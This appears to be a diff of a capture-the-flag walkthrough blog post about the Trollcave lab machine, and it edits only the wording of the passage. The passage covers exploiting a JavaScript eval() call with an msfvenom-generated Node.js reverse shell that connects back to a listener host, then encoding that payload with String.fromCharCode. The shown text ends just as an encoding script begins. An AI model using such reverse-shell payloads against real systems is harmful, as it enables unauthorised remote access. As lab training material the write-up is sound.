limbernie/limbernie.github.io/_posts/2018-04-23-trollcave-walkthrough.md

 >The argument of the `eval()` function is a string.
 If the string represents an expression, `eval()` evaluates the expression.
 If the argument represents one or more JavaScript statements, `eval()` evaluates the statements.
 Do not call `eval()` to evaluate an arithmetic expression; JavaScript evaluates arithmetic expressions automatically.

-One small caveat.
-Noticed `toString()` after `eval()`?
-We need to make sure the evaluation returned a string!
+Good thing `msfvenom` is able to generate a reverse shell payload for Node.js, but notice `toString()` after `eval()`?
+We need to make sure the evaluation returns a string so that `toString()` has something to do.

-Good thing `msfvenom` was able to generate a Node.js reverse shell payload.

 ```
 # msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.30.128 LPORT=44444 -o rev.js
 # echo '1+1;' >> rev.js  <-- this is to make sure toString() has something to do ;)
 ```

 We also need to ensure that our payload is a string.
-To do that, we could encode our payload into ordinal numbers and piece them back together with `String.fromCharCode()`.
+To do that, we can encode our payload into ordinal numbers and piece them back together with `String.fromCharCode()`.

-The following Python code did that.
+The following Python code does that.

 {% highlight python linenos %}
 # cat encode.py